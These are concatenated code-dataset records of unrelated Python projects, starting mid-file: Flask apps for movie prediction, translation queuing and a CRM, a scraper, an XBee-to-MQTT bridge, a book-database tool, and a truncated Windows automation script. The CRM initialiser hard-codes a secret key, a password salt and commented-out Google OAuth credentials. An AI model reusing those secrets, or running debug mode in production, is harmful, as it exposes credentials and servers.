Flask(__name__, template_folder=\"templates\")\nMaterial(app)\n\nmodel = None\ngraph = 
None\n\ndef load_model():\n global model\n global graph\n model = tf.keras.models.load_model(\"data/movie_model_trained_log.h5\")\n graph = tf.get_default_graph()\n\nload_model()\n\nfile = \"data/movies.csv\"\ndf = pd.read_csv(file)\n\nyears = {\n 2016 : 1,\n 2017 : 2, \n 2018 : 3\n}\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n@app.route(\"/movies_api\")\ndef movies_api():\n data = json.loads(df.to_json(orient='records'))\n return jsonify(data)\n\n@app.route(\"/released_year/\")\ndef released_year(year):\n selected_yr = df.loc[df[\"year\"] == int(year)]\n year_df = json.loads(selected_yr.to_json(orient='records'))\n return jsonify(year_df)\n\n@app.route(\"/select_year\")\ndef select_year():\n return (jsonify(list(years)))\n\n@app.route('/analyze', methods=['POST','GET'])\ndef analyze():\n dd = {\"success\": False}\n\n if request.method == 'POST':\n input_budget = int(request.form[\"budget\"])\n input_comment = int(request.form[\"comment\"])\n input_view = float(request.form[\"view\"])\n input_like = int(request.form[\"like\"])\n input_likep=input_like/input_view\n input_commentp=input_comment/input_view\n\n data=[]\n data.append(np.log(input_budget*1000000))\n data.append(np.log(input_comment*1000000))\n data.append(np.log(input_view*1000))\n data.append(np.log(input_like*1000))\n # data.append(input_likep)\n # data.append(input_commentp)\n sc=load('data/std_scaler - log.bin')\n\n with graph.as_default():\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n sess.run(tf.tables_initializer())\n a = model.predict_classes(sc.transform(np.array(data).reshape(-1,1).T))\n bb = model.predict(sc.transform(np.array(data).reshape(-1,1).T))\n print(a)\n dd[\"prediction\"] = str(a[0])\n predict=str(a[0])\n dd[\"success\"] = True\n z=f\"{(round(bb[0][0]*100,4))}%\"\n y=f\"{(round(bb[0][1]*100,4))}%\"\n\n return render_template('index.html', input_budget=input_budget, input_comment=input_comment, input_view=input_view, input_like=input_like, predict=predict, z=z, y=y)\n\n\nif __name__ == '__main__':\n app.run(debug=True)", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2720, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "flask.Flask", "line_number": 14, "usage_type": "call"}, {"api_name": "flask_material.Material", "line_number": 15, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 23, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 23, "usage_type": "attribute"}, {"api_name": "tensorflow.get_default_graph", "line_number": 24, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 29, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 39, "usage_type": "call"}, {"api_name": "simplejson.loads", "line_number": 44, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 45, "usage_type": "call"}, {"api_name": "simplejson.loads", "line_number": 50, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 51, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 55, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 61, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 61, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 62, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 62, "usage_type": "name"}, 
{"api_name": "flask.request.form", "line_number": 63, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 63, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 64, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 64, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 65, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 65, "usage_type": "name"}, {"api_name": "numpy.log", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 73, "usage_type": "call"}, {"api_name": "joblib.load", "line_number": 76, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 79, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 80, "usage_type": "call"}, {"api_name": "tensorflow.tables_initializer", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 83, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 91, "usage_type": "call"}]} +{"seq_id": "281628428", "text": "import time\nfrom flask import render_template, flash, redirect, url_for, request\nfrom app import app, db\nfrom .forms import TranslatorForm\nfrom .models import Translator\nfrom unbabel_api import post_translation, get_translation\nfrom sqlalchemy.sql.expression import func\nfrom rq import Queue\nfrom worker import conn\n\ntranslation_queue = Queue(connection=conn)\n\n\ndef create_translation(text_id, text):\n \"\"\"HTTP request to the translation endpoint. Saves the uid.\n\n :param text_id: id from the new_text instance created in home()\n :param text: text to be translated\n \"\"\"\n text_to_be_translated = Translator.query.get(text_id)\n post_text = post_translation(text)\n text_to_be_translated.uid = post_text.uid\n db.session.commit()\n\n\ndef update_translation(text_id):\n \"\"\"Check the translation status. When there are changes, save status and/or translated text.\n\n :param text_id: id from the new_text instance created in home()\n \"\"\"\n text = Translator.query.get(text_id)\n time.sleep(10)\n get_text = get_translation(text.uid)\n\n if get_text.status == 'completed':\n text.text_translated = get_text.translation\n text.status = 'translated'\n db.session.commit()\n\n elif get_text.status == 'translating':\n text.status = 'pending'\n db.session.commit()\n update_translation(text_id)\n\n elif get_text.status == 'new':\n update_translation(text_id)\n\n\n@app.route(\"/\", methods=['GET', 'POST'])\ndef home():\n \"\"\"Main function showing translated texts and translation requests.\"\"\"\n form = TranslatorForm()\n texts = Translator.query.order_by(func.length(Translator.text_translated))\n\n if request.method == 'POST' and form.validate_on_submit():\n new_text = Translator(\n text=form.text.data,\n status='requested'\n )\n db.session.add(new_text)\n db.session.commit()\n\n #: Delay execution of create_translation\n new_request = translation_queue.enqueue_call(create_translation, args=(new_text.id, new_text.text))\n # Delay execution of update_translation. This job will be queued when the \"new_request\" is completed\n translation_queue.enqueue(update_translation, args=(new_text.id,), depends_on=new_request)\n\n flash('Your text will be translated. 
Please wait.', 'success')\n return redirect(url_for('home'))\n\n return render_template('home.html', form=form, texts=texts)\n", "sub_path": "main/routes.py", "file_name": "routes.py", "file_ext": "py", "file_size_in_byte": 2436, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "rq.Queue", "line_number": 11, "usage_type": "call"}, {"api_name": "worker.conn", "line_number": 11, "usage_type": "name"}, {"api_name": "models.Translator.query.get", "line_number": 20, "usage_type": "call"}, {"api_name": "models.Translator.query", "line_number": 20, "usage_type": "attribute"}, {"api_name": "models.Translator", "line_number": 20, "usage_type": "name"}, {"api_name": "unbabel_api.post_translation", "line_number": 21, "usage_type": "call"}, {"api_name": "app.db.session.commit", "line_number": 23, "usage_type": "call"}, {"api_name": "app.db.session", "line_number": 23, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 23, "usage_type": "name"}, {"api_name": "models.Translator.query.get", "line_number": 31, "usage_type": "call"}, {"api_name": "models.Translator.query", "line_number": 31, "usage_type": "attribute"}, {"api_name": "models.Translator", "line_number": 31, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 32, "usage_type": "call"}, {"api_name": "unbabel_api.get_translation", "line_number": 33, "usage_type": "call"}, {"api_name": "app.db.session.commit", "line_number": 38, "usage_type": "call"}, {"api_name": "app.db.session", "line_number": 38, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 38, "usage_type": "name"}, {"api_name": "app.db.session.commit", "line_number": 42, "usage_type": "call"}, {"api_name": "app.db.session", "line_number": 42, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 42, "usage_type": "name"}, {"api_name": "forms.TranslatorForm", "line_number": 52, "usage_type": "call"}, {"api_name": "models.Translator.query.order_by", "line_number": 53, "usage_type": "call"}, {"api_name": "models.Translator.query", "line_number": 53, "usage_type": "attribute"}, {"api_name": "models.Translator", "line_number": 53, "usage_type": "name"}, {"api_name": "sqlalchemy.sql.expression.func.length", "line_number": 53, "usage_type": "call"}, {"api_name": "sqlalchemy.sql.expression.func", "line_number": 53, "usage_type": "name"}, {"api_name": "models.Translator.text_translated", "line_number": 53, "usage_type": "attribute"}, {"api_name": "flask.request.method", "line_number": 55, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 55, "usage_type": "name"}, {"api_name": "models.Translator", "line_number": 56, "usage_type": "call"}, {"api_name": "app.db.session.add", "line_number": 60, "usage_type": "call"}, {"api_name": "app.db.session", "line_number": 60, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 60, "usage_type": "name"}, {"api_name": "app.db.session.commit", "line_number": 61, "usage_type": "call"}, {"api_name": "app.db.session", "line_number": 61, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 61, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 68, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 69, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 69, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 71, "usage_type": "call"}, {"api_name": "app.app.route", "line_number": 49, "usage_type": "call"}, 
{"api_name": "app.app", "line_number": 49, "usage_type": "name"}]} +{"seq_id": "4433212", "text": "# @author by quanvo\n# @des\n\n\nimport argparse\nimport sys\nfrom lib.train import TrainingModel\nfrom lib.classfication_svc import ClassificationSVC\nfrom lib.classfication_pipe import ClassificationPiPe\n\n# add help when run cmd\nparser = argparse.ArgumentParser(description=\"Please add type run\")\nparser.add_argument('mode', type=str, help=\"Choice one mode to run [train, svc, pipe-svm, pipe-navie]\")\n\n\n\nif __name__ == '__main__':\n args = parser.parse_args(sys.argv[1:])\n print('Running with mode %s' %args.mode)\n if(args.mode == 'train'):\n TrainingModel.train()\n if(args.mode == 'svm'):\n ClassificationSVC.run('svm')\n if(args.mode == 'naive'):\n ClassificationSVC.run('naive')\n if(args.mode == 'pipe-svm'):\n pipe =ClassificationPiPe('svm')\n pipe.run()\n if(args.mode == 'pipe-navie'):\n pipe = ClassificationPiPe('navie')\n pipe.run()\n if(args.mode == 'pipe-tree'):\n pipe = ClassificationPiPe('tree')\n pipe.run()\n \n \n\n", "sub_path": "Sentence2vec/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1002, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 12, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 18, "usage_type": "attribute"}, {"api_name": "lib.train.TrainingModel.train", "line_number": 21, "usage_type": "call"}, {"api_name": "lib.train.TrainingModel", "line_number": 21, "usage_type": "name"}, {"api_name": "lib.classfication_svc.ClassificationSVC.run", "line_number": 23, "usage_type": "call"}, {"api_name": "lib.classfication_svc.ClassificationSVC", "line_number": 23, "usage_type": "name"}, {"api_name": "lib.classfication_svc.ClassificationSVC.run", "line_number": 25, "usage_type": "call"}, {"api_name": "lib.classfication_svc.ClassificationSVC", "line_number": 25, "usage_type": "name"}, {"api_name": "lib.classfication_pipe.ClassificationPiPe", "line_number": 27, "usage_type": "call"}, {"api_name": "lib.classfication_pipe.ClassificationPiPe", "line_number": 30, "usage_type": "call"}, {"api_name": "lib.classfication_pipe.ClassificationPiPe", "line_number": 33, "usage_type": "call"}]} +{"seq_id": "105843174", "text": "\"\"\"\nInitialize Flask app\n\n\"\"\"\n#coding=utf-8\n\nfrom flask import Flask\nimport os\nfrom datetime import timedelta\nfrom flask_debugtoolbar import DebugToolbarExtension\nfrom werkzeug.debug import DebuggedApplication\n\nfrom flask.ext.login import LoginManager\n# from flask_googlelogin import GoogleLogin\nfrom flask_mongoengine import MongoEngine\nfrom flask_mail import Mail, Message\n\nfrom flask_apscheduler import APScheduler\n\n\napp = Flask('application')\n\nif os.getenv('FLASK_CONF') == 'TEST':\n app.config.from_object('application.settings.Testing')\n\nelif 'SERVER_SOFTWARE' in os.environ and os.environ['SERVER_SOFTWARE'].startswith('Dev'):\n # Development settings\n app.config.from_object('application.settings.Development')\n\n # Flask-DebugToolbar\n toolbar = DebugToolbarExtension(app)\n\n # Google app engine mini profiler\n # https://github.com/kamens/gae_mini_profiler\n app.wsgi_app = DebuggedApplication(app.wsgi_app, evalex=True)\n\n from gae_mini_profiler import profiler, templatetags\n\n @app.context_processor\n def inject_profiler():\n return dict(profiler_includes=templatetags.profiler_includes())\n app.wsgi_app = profiler.ProfilerWSGIMiddleware(app.wsgi_app)\nelse:\n 
app.config.from_object('application.settings.Production')\n\n# Enable jinja2 loop controls extension\napp.jinja_env.add_extension('jinja2.ext.loopcontrols')\n\nAPP_ROOT = os.path.dirname(os.path.abspath(__file__)) # refers to application_top\nAPP_STATIC = os.path.join(APP_ROOT, 'static')\n\napp.config['MONGODB_SETTINGS'] = {\n 'db': 'crm_yoomee'\n # 'db': 'ici_cm',\n # 'host': 'localhost',\n # 'port': 28569\n}\n\n# This is the path to the upload directory\nCURRENT_FILE = os.path.abspath(__file__)\nCURRENT_DIR = os.path.dirname(CURRENT_FILE)\n\napp.config['FOLDER_PROJECT'] = os.path.dirname(CURRENT_DIR)\napp.config['FOLDER_APPS'] = CURRENT_DIR # Modules\napp.config['STATIC_APPS'] = CURRENT_DIR+'/static'\n\nici_link_categorie = 'ici_cm/media/pictures/categories'\nici_link = 'ici_cm/media/pictures/companies'\n\napp.config['UPLOAD_FOLDER_CATEGORIE'] = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(APP_ROOT))), ici_link_categorie)\napp.config['UPLOAD_FOLDER_CLIENT'] = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(APP_ROOT))), ici_link)\n\n# These are the extension that we are accepting to be uploaded\napp.config['ALLOWED_EXTENSIONS'] = set(['png', 'jpg', 'jpeg'])\n\napp.config['SECRET_KEY'] = '4fdb4fed4631d84f17c9711'\napp.config['SECURITY_PASSWORD_SALT'] = '4fdb4fed4631d84f17c97112e3d85442324848a29c4291a65ff53dc64bfd9a10'\n\n# app.config[\"MAIL_SERVER\"] = 'smtp.gmail.com'\n# app.config[\"MAIL_PORT\"] = 465\n# app.config[\"MAIL_USE_TLS\"] = False\n# app.config[\"MAIL_USE_SSL\"] = True\n# app.config[\"MAIL_USERNAME\"] = 'wilrona@gmail.com'\n# app.config[\"MAIL_PASSWORD\"] = ''\n\ndb = MongoEngine(app)\nmail = Mail(app)\n\nfrom application.modules.utilities.cron import Config\n\napp.config.from_object(Config())\n\nscheduler = APScheduler()\nscheduler.init_app(app)\n\n# app.permanent_session_lifetime = timedelta(seconds=1200)\n\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\nlogin_manager.login_view = 'home'\n\n# app.config.update(\n# SECRET_KEY='AIzaSyBBT8JaFtFr2Gknpe5GxvhYMWdxkxULHSc',\n# GOOGLE_LOGIN_CLIENT_ID='667156749456-lbd0uctkmb0vscjn2q0e1420f20fu435.apps.googleusercontent.com',\n# GOOGLE_LOGIN_CLIENT_SECRET='TOTRxDbDVTyC-I3uZ0ATX3kJ',\n# GOOGLE_LOGIN_REDIRECT_URI='http://localhost:9090/user/oauth2callback'\n# # GOOGLE_LOGIN_REDIRECT_URI='http://fdt.accentcom.agency/user/oauth2callback'\n# )\n#\n# google_login = GoogleLogin(app)\n\n# function for jinja2\nimport function\n\napp.url_map.converters['objectid'] = function.ObjectIDConverter\napp.jinja_env.filters['format_date'] = function.format_date\napp.jinja_env.filters['format_date_month'] = function.format_date_month\napp.jinja_env.filters['add_time'] = function.add_time\napp.jinja_env.filters['format_price'] = function.format_price\napp.jinja_env.filters['get_first_day'] = function.get_first_day\napp.jinja_env.filters['get_last_day'] = function.get_last_day\napp.jinja_env.filters['string'] = function.string\n\n\n# Pull in URL dispatch routes\nimport urls\n\n\n\n\n\n\n", "sub_path": "application/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 4158, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "flask.Flask", "line_number": 21, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 23, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 26, "usage_type": "attribute"}, {"api_name": "flask_debugtoolbar.DebugToolbarExtension", "line_number": 31, "usage_type": "call"}, 
{"api_name": "werkzeug.debug.DebuggedApplication", "line_number": 35, "usage_type": "call"}, {"api_name": "gae_mini_profiler.templatetags.profiler_includes", "line_number": 41, "usage_type": "call"}, {"api_name": "gae_mini_profiler.templatetags", "line_number": 41, "usage_type": "name"}, {"api_name": "gae_mini_profiler.profiler.ProfilerWSGIMiddleware", "line_number": 42, "usage_type": "call"}, {"api_name": "gae_mini_profiler.profiler", "line_number": 42, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 71, "usage_type": "call"}, {"api_name": "flask_mongoengine.MongoEngine", "line_number": 86, "usage_type": "call"}, {"api_name": "flask_mail.Mail", "line_number": 87, "usage_type": "call"}, {"api_name": "application.modules.utilities.cron.Config", "line_number": 91, "usage_type": "call"}, {"api_name": "flask_apscheduler.APScheduler", "line_number": 93, "usage_type": "call"}, {"api_name": "flask.ext.login.LoginManager", "line_number": 98, "usage_type": "call"}, {"api_name": "function.ObjectIDConverter", "line_number": 115, "usage_type": "attribute"}, {"api_name": "function.format_date", "line_number": 116, "usage_type": "attribute"}, {"api_name": "function.format_date_month", "line_number": 117, "usage_type": "attribute"}, {"api_name": "function.add_time", "line_number": 118, "usage_type": "attribute"}, {"api_name": "function.format_price", "line_number": 119, "usage_type": "attribute"}, {"api_name": "function.get_first_day", "line_number": 120, "usage_type": "attribute"}, {"api_name": "function.get_last_day", "line_number": 121, "usage_type": "attribute"}, {"api_name": "function.string", "line_number": 122, "usage_type": "attribute"}]} +{"seq_id": "427584685", "text": "#!/usr/bin/env python3\nimport os\nimport requests\nfrom bs4 import BeautifulSoup\n\nfrom constants import ROOT_URL\nfrom download_subject import download_subject\nfrom tqdm import tqdm\n\n\ndef download_semestr(url, dest):\n try:\n os.makedirs(dest, exist_ok=True)\n\n html_str = requests.get(url).text\n html = BeautifulSoup(html_str, 'html.parser')\n\n result_table = html.find(id='subject-table')\n if result_table is None:\n return\n for link_el in tqdm(result_table.find_all('a'), desc=url):\n link_str_relative = link_el['href']\n if not 'filearray' in link_str_relative:\n continue\n link_str_absolute = ROOT_URL + link_str_relative\n name = link_el.string\n 
download_subject(link_str_absolute, os.path.join(dest, name))\n except:\n print('Failed at semestr', url)\n raise\n\n\nif __name__ == '__main__':\n try:\n assert len(os.sys.argv) >= 3\n url = os.sys.argv[1]\n dest = os.sys.argv[2]\n except AssertionError:\n print('USAGE: python3 download_semestr.py URL DEST')\n exit(1)\n\n download_semestr(url, dest)\n\n", "sub_path": "download_semestr.py", "file_name": "download_semestr.py", "file_ext": "py", "file_size_in_byte": 1167, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.makedirs", "line_number": 13, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 15, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 16, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 21, "usage_type": "call"}, {"api_name": "constants.ROOT_URL", "line_number": 25, "usage_type": "name"}, {"api_name": "download_subject.download_subject", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.sys", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.sys", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.sys", "line_number": 37, "usage_type": "attribute"}]} +{"seq_id": "250473094", "text": "# import os\n# os.system(\"istats all\")\nimport subprocess\nimport serial\nimport time\n\n\n\n\n\n# XBee setting\nserdev = '/dev/tty.usbserial-AC00CNOV'\ns = serial.Serial(serdev, 9600)\n\n# s.write(\"+++\".encode())\n# char = s.read(2)\n# print(\"Enter AT mode.\")\n# print(char.decode())\n\n# s.write(\"ATMY 0x270\\r\\n\".encode())\n# char = s.read(3)\n# print(\"Set MY 0x270.\")\n# print(char.decode())\n\n# s.write(\"ATDL 0x170\\r\\n\".encode())\n# char = s.read(3)\n# print(\"Set DL 0x170.\")\n# print(char.decode())\n\n# s.write(\"ATWR\\r\\n\".encode())\n# char = s.read(3)\n# print(\"Write config.\")\n# print(char.decode())\n\n# s.write(\"ATMY\\r\\n\".encode())\n# char = s.read(4)\n# print(\"MY :\")\n# print(char.decode())\n\n# s.write(\"ATDL\\r\\n\".encode())\n# char = s.read(4)\n# print(\"DL : \")\n# print(char.decode())\n\n# s.write(\"ATCN\\r\\n\".encode())\n# char = s.read(3)\n# print(\"Exit AT mode.\")\n\n# print(char.decode())\n\nimport paho.mqtt.client as paho\nimport time\nmqttc = paho.Client()\n\n# Settings for connection\nhost = \"localhost\"\ntopic= \"Mbed\"\nport = 1883\n\n# Callbacks\ndef on_connect(self, mosq, obj, rc):\n print(\"Connected rc: \" + str(rc))\n\ndef on_message(mosq, obj, msg):\n print(\"[Received] Topic: \" + msg.topic + \", Message: \" + str(msg.payload) + \"\\n\");\n\ndef on_subscribe(mosq, obj, mid, granted_qos):\n print(\"Subscribed OK\")\n\ndef on_unsubscribe(mosq, obj, mid, granted_qos):\n print(\"Unsubscribed OK\")\n\n# Set callbacks\nmqttc.on_message = on_message\nmqttc.on_connect = on_connect\nmqttc.on_subscribe = on_subscribe\nmqttc.on_unsubscribe = on_unsubscribe\n\n# Connect and subscribe\nprint(\"Connecting to \" + host + \"/\" + topic)\nmqttc.connect(host, port=1883, keepalive=60)\nmqttc.subscribe(topic, 0)\n \n\n\nfirst = True\nwhile True:\n if first:\n line = s.read(13)\n first = False\n else:\n line = s.read(13)\n print('Get:', line.decode())\n\n mesg = line.decode()\n mqttc.publish(topic, mesg)\n print('Sent:' , mesg)\n time.sleep(1)\n # s.write(fan.encode())\n # line = s.read(20)\n # print('Get:', line.decode())\n\n # 
s.write(battery.encode())\n # line = s.read(21)\n # print('Get:', line.decode())\n\n # s.close()\n\n", "sub_path": "hw5_mqtt/message.py", "file_name": "message.py", "file_ext": "py", "file_size_in_byte": 2110, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "serial.Serial", "line_number": 13, "usage_type": "call"}, {"api_name": "paho.mqtt.client.Client", "line_number": 53, "usage_type": "call"}, {"api_name": "paho.mqtt.client", "line_number": 53, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 98, "usage_type": "call"}]} +{"seq_id": "290252642", "text": "#!/usr/bin/env python\n#\n# Written by Scott Hendrickson\n#\n# 2006/01/09\n# 2019/12/15\n#\n# Tools for manipulating the book database \n###################################################\n\nimport sys\nimport json\nimport logging\nimport optparse\n\nfrom bookdbtool.tools import bookDBTool\n\nif __name__ == '__main__':\n logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)\n parser = optparse.OptionParser()\n parser.add_option(\"-c\", \"--config\", default=\"./configuration.json\", dest=\"config_filename\",\n help=\"Configuration file for database access.\")\n parser.add_option(\"-d\", \"--cleanup\", action=\"store_true\",dest=\"dup\",\n help=\"Remove duplicate tag entries from Tag table. Set tags to lowercase.\")\n parser.add_option(\"-f\", dest=\"tagattr\", nargs=2,\n help=\"Enter tag and field values, e.g. -f poetry Poetry. Each occurrence of\" + \\\n \" (field) in column Category will result in tagging the record with (tag).\")\n parser.add_option(\"-s\", \"--show\", action=\"store_true\", dest=\"show\",\n help=\"Show tags and fields.\", default=False)\n parser.add_option(\"-t\", \"--show_only_spell\", action=\"store_true\", dest=\"only_spell\", default=False,\n help=\"Show tags and fields.\")\n parser.add_option(\"--csv\", action=\"store_true\", dest=\"dumpcsv\", default=False,\n help=\"CSV dump from pandas\")\n parser.add_option(\"-u\", dest=\"current_update\", nargs=2,\n help=\"Enter current tag value and updated tag value, e.g. 
-u poetyr poetry.\")\n (options, args) = parser.parse_args()\n\n with open(options.config_filename, \"r\") as config_file:\n c = json.load(config_file)\n logging.debug(\"{}\".format(c))\n try:\n UN = c[\"username\"].strip()\n PWD = c[\"password\"].strip()\n DB = c[\"database\"].strip()\n DBHOST = c[\"host\"].strip()\n except KeyError as e:\n logging.error(e)\n sys.exit()\n\n bt = bookDBTool(DBHOST, UN, PWD, DB)\n if (options.tagattr):\n logging.info(\"Adding tag \" + options.tagattr[0] + \" to records in category \" + options.tagattr[1])\n bt.tag_from_category(options.tagattr[0], options.tagattr[1])\n if (options.current_update):\n logging.info(\"Updating tag \" + options.current_update[0] + \" to \" + options.current_update[1])\n bt.update_tag_value(options.current_update[0], options.current_update[1])\n if (options.dup):\n logging.info(\"Updating all tags to lower case...\")\n bt.lower_case_tags()\n logging.info(\"Removing duplicate and null tags...\")\n bt.deduplicate_tags()\n if (options.show or options.only_spell):\n logging.info(\"Tags:\")\n bt.show_tags(only_spell=options.only_spell)\n logging.info(\"Locations:\")\n bt.show_locations()\n if (options.dumpcsv):\n df = bt.get_dataframe()\n print(df.to_csv())\n bt.close()\n", "sub_path": "tools/bin/booktool.py", "file_name": "booktool.py", "file_ext": "py", "file_size_in_byte": 2860, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.basicConfig", "line_number": 19, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 19, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 19, "usage_type": "attribute"}, {"api_name": "optparse.OptionParser", "line_number": 20, "usage_type": "call"}, {"api_name": "json.load", "line_number": 39, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 40, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 47, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 48, "usage_type": "call"}, {"api_name": "bookdbtool.tools.bookDBTool", "line_number": 50, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 52, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 55, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 58, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 60, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 63, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 65, "usage_type": "call"}]} +{"seq_id": "213118176", "text": "# -*- coding: utf-8 -*-\n# 请使用Python 3.4\nimport os\nimport win32api, win32con, win32gui\nimport win32con\nimport time\nimport uuid\nimport wmi\nimport base64\nimport math\nimport operator\nfrom functools import reduce\nfrom PIL import ImageGrab\nfrom PIL import Image\nimport subprocess\n\n\nINPUT_YOURS_SHIT = b'ZDA1MDk5MjE1MTU4QkZFQkZCRkYwMDAzMDZBOQ==\\n'\n# SEND_TIMES = 5\n\ndef write_file(filename, mode, content):\n \"\"\"写入文件内容\n filename为文件名\n mode为写入方式\n content为写入内容\n \"\"\"\n file_handle = open(filename, mode)\n file_handle.write(str(content))\n file_handle.close\n\n\ndef get_hwnd(class_name, title=None):\n \"\"\"获取窗口句柄\n class_name为要获取窗口的类名\n title为要获取的窗口的标题,可选项,默认为None\n 若成功返回句柄,若失败返回0\n \"\"\"\n hwnd = win32gui.FindWindow(class_name, title)\n return hwnd\n\n\ndef get_wnd_text(hwnd):\n \"\"\"获取窗口标题\n hwnd为窗口的句柄\n 若成功返回标题,失败返回None\n \"\"\"\n text = win32gui.GetWindowText(hwnd)\n return text\n\n\ndef change_wnd_text(hwnd, 
